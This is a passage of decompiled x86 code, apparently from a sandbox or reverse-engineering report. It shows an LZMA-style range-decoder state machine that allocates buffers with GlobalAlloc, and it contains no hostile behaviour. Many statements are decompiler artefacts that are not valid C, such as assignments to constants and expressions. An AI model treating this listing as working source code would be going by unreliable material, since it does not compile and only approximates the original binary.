                          				signed int _t576;
                          				signed int _t597;
                          				signed int* _t614;
                          				void* _t621;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t621 - 0x40) != 1) {
                          						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                          						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                          						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                          						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                          						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                          						_t539 =  *(_t621 - 4) + 0x664;
                          						 *(_t621 - 0x58) = _t539;
                          						goto L68;
                          					} else {
                          						 *(__ebp - 0x84) = 8;
                          						while(1) {
                          							L132:
                          							 *(_t621 - 0x54) = _t614;
                          							while(1) {
                          								L133:
                          								_t540 =  *_t614;
                          								_t597 = _t540 & 0x0000ffff;
                          								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                          								if( *(_t621 - 0xc) >= _t573) {
                          									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                          									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                          									 *(_t621 - 0x40) = 1;
                          									_t541 = _t540 - (_t540 >> 5);
                          									 *_t614 = _t541;
                          								} else {
                          									 *(_t621 - 0x10) = _t573;
                          									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                          								}
                          								if( *(_t621 - 0x10) >= 0x1000000) {
                          									goto L139;
                          								}
                          								L137:
                          								if( *(_t621 - 0x6c) == 0) {
                          									 *(_t621 - 0x88) = 5;
                          									L170:
                          									_t576 = 0x22;
                          									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                          									_t544 = 0;
                          									L172:
                          									return _t544;
                          								}
                          								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                          								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                          								L139:
                          								_t542 =  *(_t621 - 0x84);
                          								while(1) {
                          									 *(_t621 - 0x88) = _t542;
                          									while(1) {
                          										L1:
                          										_t543 =  *(_t621 - 0x88);
                          										if(_t543 > 0x1c) {
                          											break;
                          										}
                          										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
                          											case 0:
                          												if( *(_t621 - 0x6c) == 0) {
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          												_t543 =  *( *(_t621 - 0x70));
                          												if(_t543 > 0xe1) {
                          													goto L171;
                          												}
                          												_t547 = _t543 & 0x000000ff;
                          												_push(0x2d);
                          												asm("cdq");
                          												_pop(_t578);
                          												_push(9);
                          												_pop(_t579);
                          												_t617 = _t547 / _t578;
                          												_t549 = _t547 % _t578 & 0x000000ff;
                          												asm("cdq");
                          												_t612 = _t549 % _t579 & 0x000000ff;
                          												 *(_t621 - 0x3c) = _t612;
                          												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                          												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                          												_t620 = (0x300 << _t612 + _t617) + 0x736;
                          												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                          													L10:
                          													if(_t620 == 0) {
                          														L12:
                          														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                          														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          														goto L15;
                          													} else {
                          														goto L11;
                          													}
                          													do {
                          														L11:
                          														_t620 = _t620 - 1;
                          														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                          													} while (_t620 != 0);
                          													goto L12;
                          												}
                          												if( *(_t621 - 4) != 0) {
                          													GlobalFree( *(_t621 - 4));
                          												}
                          												_t543 = GlobalAlloc(0x40, 0x600); // executed
                          												 *(_t621 - 4) = _t543;
                          												if(_t543 == 0) {
                          													goto L171;
                          												} else {
                          													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                          													goto L10;
                          												}
                          											case 1:
                          												L13:
                          												__eflags =  *(_t621 - 0x6c);
                          												if( *(_t621 - 0x6c) == 0) {
                          													 *(_t621 - 0x88) = 1;
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                          												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                          												_t45 = _t621 - 0x48;
                          												 *_t45 =  *(_t621 - 0x48) + 1;
                          												__eflags =  *_t45;
                          												L15:
                          												if( *(_t621 - 0x48) < 4) {
                          													goto L13;
                          												}
                          												_t555 =  *(_t621 - 0x40);
                          												if(_t555 ==  *(_t621 - 0x74)) {
                          													L20:
                          													 *(_t621 - 0x48) = 5;
                          													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                          													goto L23;
                          												}
                          												 *(_t621 - 0x74) = _t555;
                          												if( *(_t621 - 8) != 0) {
                          													GlobalFree( *(_t621 - 8));
                          												}
                          												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                          												 *(_t621 - 8) = _t543;
                          												if(_t543 == 0) {
                          													goto L171;
                          												} else {
                          													goto L20;
                          												}
                          											case 2:
                          												L24:
                          												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                          												 *(_t621 - 0x84) = 6;
                          												 *(_t621 - 0x4c) = _t562;
                          												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                          												goto L132;
                          											case 3:
                          												L21:
                          												__eflags =  *(_t621 - 0x6c);
                          												if( *(_t621 - 0x6c) == 0) {
                          													 *(_t621 - 0x88) = 3;
                          													goto L170;
                          												}
                          												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                          												_t67 = _t621 - 0x70;
                          												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                          												__eflags =  *_t67;
                          												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                          												L23:
                          												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                          												if( *(_t621 - 0x48) != 0) {
                          													goto L21;
                          												}
                          												goto L24;
                          											case 4:
                          												L133:
                          												_t540 =  *_t614;
                          												_t597 = _t540 & 0x0000ffff;
                          												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                          												if( *(_t621 - 0xc) >= _t573) {
                          													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                          													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                          													 *(_t621 - 0x40) = 1;
                          													_t541 = _t540 - (_t540 >> 5);
                          													 *_t614 = _t541;
                          												} else {
                          													 *(_t621 - 0x10) = _t573;
                          													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                          													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                          												}
                          												if( *(_t621 - 0x10) >= 0x1000000) {
                          													goto L139;
                          												}
                          											case 5:
                          												goto L137;
                          											case 6:
                          												__edx = 0;
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x34) = 1;
                          													 *(__ebp - 0x84) = 7;
                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          												__esi =  *(__ebp - 0x60);
                          												__cl = 8;
                          												__cl = 8 -  *(__ebp - 0x3c);
                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          												__ecx =  *(__ebp - 0x3c);
                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          												__ecx =  *(__ebp - 4);
                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          												__eflags =  *(__ebp - 0x38) - 4;
                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          												if( *(__ebp - 0x38) >= 4) {
                          													__eflags =  *(__ebp - 0x38) - 0xa;
                          													if( *(__ebp - 0x38) >= 0xa) {
                          														_t98 = __ebp - 0x38;
                          														 *_t98 =  *(__ebp - 0x38) - 6;
                          														__eflags =  *_t98;
                          													} else {
                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          													}
                          												} else {
                          													 *(__ebp - 0x38) = 0;
                          												}
                          												__eflags =  *(__ebp - 0x34) - __edx;
                          												if( *(__ebp - 0x34) == __edx) {
                          													__ebx = 0;
                          													__ebx = 1;
                          													goto L61;
                          												} else {
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__ecx =  *(__ebp - 8);
                          													__ebx = 0;
                          													__ebx = 1;
                          													__al =  *((intOrPtr*)(__eax + __ecx));
                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          													goto L41;
                          												}
                          											case 7:
                          												goto L0;
                          											case 8:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xa;
                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          												} else {
                          													__eax =  *(__ebp - 0x38);
                          													__ecx =  *(__ebp - 4);
                          													__eax =  *(__ebp - 0x38) + 0xf;
                          													 *(__ebp - 0x84) = 9;
                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          												}
                          												while(1) {
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          											case 9:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													goto L89;
                          												}
                          												__eflags =  *(__ebp - 0x60);
                          												if( *(__ebp - 0x60) == 0) {
                          													goto L171;
                          												}
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                          												__eflags = _t258;
                          												0 | _t258 = _t258 + _t258 + 9;
                          												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                          												goto L75;
                          											case 0xa:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 4);
                          													__ecx =  *(__ebp - 0x38);
                          													 *(__ebp - 0x84) = 0xb;
                          													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          													while(1) {
                          														L132:
                          														 *(_t621 - 0x54) = _t614;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x28);
                          												goto L88;
                          											case 0xb:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__ecx =  *(__ebp - 0x24);
                          													__eax =  *(__ebp - 0x20);
                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          												} else {
                          													__eax =  *(__ebp - 0x24);
                          												}
                          												__ecx =  *(__ebp - 0x28);
                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          												L88:
                          												__ecx =  *(__ebp - 0x2c);
                          												 *(__ebp - 0x2c) = __eax;
                          												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          												L89:
                          												__eax =  *(__ebp - 4);
                          												 *(__ebp - 0x80) = 0x15;
                          												__eax =  *(__ebp - 4) + 0xa68;
                          												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          												goto L68;
                          											case 0xc:
                          												L99:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xc;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t334 = __ebp - 0x70;
                          												 *_t334 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t334;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												__eax =  *(__ebp - 0x2c);
                          												goto L101;
                          											case 0xd:
                          												L37:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xd;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t122 = __ebp - 0x70;
                          												 *_t122 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t122;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L39:
                          												__eax =  *(__ebp - 0x40);
                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          													goto L48;
                          												}
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													goto L54;
                          												}
                          												L41:
                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          												 *(__ebp - 0x48) = __eax;
                          												__eax = __eax + 1;
                          												__eax = __eax << 8;
                          												__eax = __eax + __ebx;
                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edx = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													 *(__ebp - 0x40) = 1;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													__ebx = __ebx + __ebx + 1;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edx;
                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L39;
                          												} else {
                          													goto L37;
                          												}
                          											case 0xe:
                          												L46:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xe;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t156 = __ebp - 0x70;
                          												 *_t156 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t156;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												while(1) {
                          													L48:
                          													__eflags = __ebx - 0x100;
                          													if(__ebx >= 0x100) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x58);
                          													__edx = __ebx + __ebx;
                          													__ecx =  *(__ebp - 0x10);
                          													__esi = __edx + __eax;
                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                          													__ax =  *__esi;
                          													 *(__ebp - 0x54) = __esi;
                          													__edi = __ax & 0x0000ffff;
                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          													__eflags =  *(__ebp - 0xc) - __ecx;
                          													if( *(__ebp - 0xc) >= __ecx) {
                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          														__cx = __ax;
                          														_t170 = __edx + 1; // 0x1
                          														__ebx = _t170;
                          														__cx = __ax >> 5;
                          														__eflags = __eax;
                          														 *__esi = __ax;
                          													} else {
                          														 *(__ebp - 0x10) = __ecx;
                          														0x800 = 0x800 - __edi;
                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          														__ebx = __ebx + __ebx;
                          														 *__esi = __cx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														continue;
                          													} else {
                          														goto L46;
                          													}
                          												}
                          												L54:
                          												_t173 = __ebp - 0x34;
                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          												__eflags =  *_t173;
                          												goto L55;
                          											case 0xf:
                          												L58:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0xf;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t203 = __ebp - 0x70;
                          												 *_t203 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t203;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L60:
                          												__eflags = __ebx - 0x100;
                          												if(__ebx >= 0x100) {
                          													L55:
                          													__al =  *(__ebp - 0x44);
                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          													goto L56;
                          												}
                          												L61:
                          												__eax =  *(__ebp - 0x58);
                          												__edx = __ebx + __ebx;
                          												__ecx =  *(__ebp - 0x10);
                          												__esi = __edx + __eax;
                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                          												__ax =  *__esi;
                          												 *(__ebp - 0x54) = __esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													_t217 = __edx + 1; // 0x1
                          													__ebx = _t217;
                          													__cx = __ax >> 5;
                          													__eflags = __eax;
                          													 *__esi = __ax;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													__ebx = __ebx + __ebx;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L60;
                          												} else {
                          													goto L58;
                          												}
                          											case 0x10:
                          												L109:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x10;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t365 = __ebp - 0x70;
                          												 *_t365 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t365;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												goto L111;
                          											case 0x11:
                          												L68:
                          												_t614 =  *(_t621 - 0x58);
                          												 *(_t621 - 0x84) = 0x12;
                          												while(1) {
                          													L132:
                          													 *(_t621 - 0x54) = _t614;
                          													goto L133;
                          												}
                          											case 0x12:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													__eax =  *(__ebp - 0x58);
                          													 *(__ebp - 0x84) = 0x13;
                          													__esi =  *(__ebp - 0x58) + 2;
                          													while(1) {
                          														L132:
                          														 *(_t621 - 0x54) = _t614;
                          														goto L133;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												__eflags = __eax;
                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                          												goto L130;
                          											case 0x13:
                          												__eflags =  *(__ebp - 0x40);
                          												if( *(__ebp - 0x40) != 0) {
                          													_t469 = __ebp - 0x58;
                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                          													__eflags =  *_t469;
                          													 *(__ebp - 0x30) = 0x10;
                          													 *(__ebp - 0x40) = 8;
                          													L144:
                          													 *(__ebp - 0x7c) = 0x14;
                          													goto L145;
                          												}
                          												__eax =  *(__ebp - 0x4c);
                          												__ecx =  *(__ebp - 0x58);
                          												__eax =  *(__ebp - 0x4c) << 4;
                          												 *(__ebp - 0x30) = 8;
                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          												L130:
                          												 *(__ebp - 0x58) = __eax;
                          												 *(__ebp - 0x40) = 3;
                          												goto L144;
                          											case 0x14:
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          												__eax =  *(__ebp - 0x80);
                          												 *(_t621 - 0x88) = _t542;
                          												goto L1;
                          											case 0x15:
                          												__eax = 0;
                          												__eflags =  *(__ebp - 0x38) - 7;
                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          												__al = __al & 0x000000fd;
                          												__eax = (__eflags >= 0) - 1 + 0xb;
                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          												goto L120;
                          											case 0x16:
                          												__eax =  *(__ebp - 0x30);
                          												__eflags = __eax - 4;
                          												if(__eax >= 4) {
                          													_push(3);
                          													_pop(__eax);
                          												}
                          												__ecx =  *(__ebp - 4);
                          												 *(__ebp - 0x40) = 6;
                          												__eax = __eax << 7;
                          												 *(__ebp - 0x7c) = 0x19;
                          												 *(__ebp - 0x58) = __eax;
                          												goto L145;
                          											case 0x17:
                          												L145:
                          												__eax =  *(__ebp - 0x40);
                          												 *(__ebp - 0x50) = 1;
                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          												goto L149;
                          											case 0x18:
                          												L146:
                          												__eflags =  *(__ebp - 0x6c);
                          												if( *(__ebp - 0x6c) == 0) {
                          													 *(__ebp - 0x88) = 0x18;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x70);
                          												__eax =  *(__ebp - 0xc);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												_t484 = __ebp - 0x70;
                          												 *_t484 =  *(__ebp - 0x70) + 1;
                          												__eflags =  *_t484;
                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          												L148:
                          												_t487 = __ebp - 0x48;
                          												 *_t487 =  *(__ebp - 0x48) - 1;
                          												__eflags =  *_t487;
                          												L149:
                          												__eflags =  *(__ebp - 0x48);
                          												if( *(__ebp - 0x48) <= 0) {
                          													__ecx =  *(__ebp - 0x40);
                          													__ebx =  *(__ebp - 0x50);
                          													0 = 1;
                          													__eax = 1 << __cl;
                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          													__eax =  *(__ebp - 0x7c);
                          													 *(__ebp - 0x44) = __ebx;
                          													while(1) {
                          														 *(_t621 - 0x88) = _t542;
                          														goto L1;
                          													}
                          												}
                          												__eax =  *(__ebp - 0x50);
                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          												__eax =  *(__ebp - 0x58);
                          												__esi = __edx + __eax;
                          												 *(__ebp - 0x54) = __esi;
                          												__ax =  *__esi;
                          												__edi = __ax & 0x0000ffff;
                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          												__eflags =  *(__ebp - 0xc) - __ecx;
                          												if( *(__ebp - 0xc) >= __ecx) {
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          													__cx = __ax;
                          													__cx = __ax >> 5;
                          													__eax = __eax - __ecx;
                          													__edx = __edx + 1;
                          													__eflags = __edx;
                          													 *__esi = __ax;
                          													 *(__ebp - 0x50) = __edx;
                          												} else {
                          													 *(__ebp - 0x10) = __ecx;
                          													0x800 = 0x800 - __edi;
                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          													 *__esi = __cx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													goto L148;
                          												} else {
                          													goto L146;
                          												}
                          											case 0x19:
                          												__eflags = __ebx - 4;
                          												if(__ebx < 4) {
                          													 *(__ebp - 0x2c) = __ebx;
                          													L119:
                          													_t393 = __ebp - 0x2c;
                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                          													__eflags =  *_t393;
                          													L120:
                          													__eax =  *(__ebp - 0x2c);
                          													__eflags = __eax;
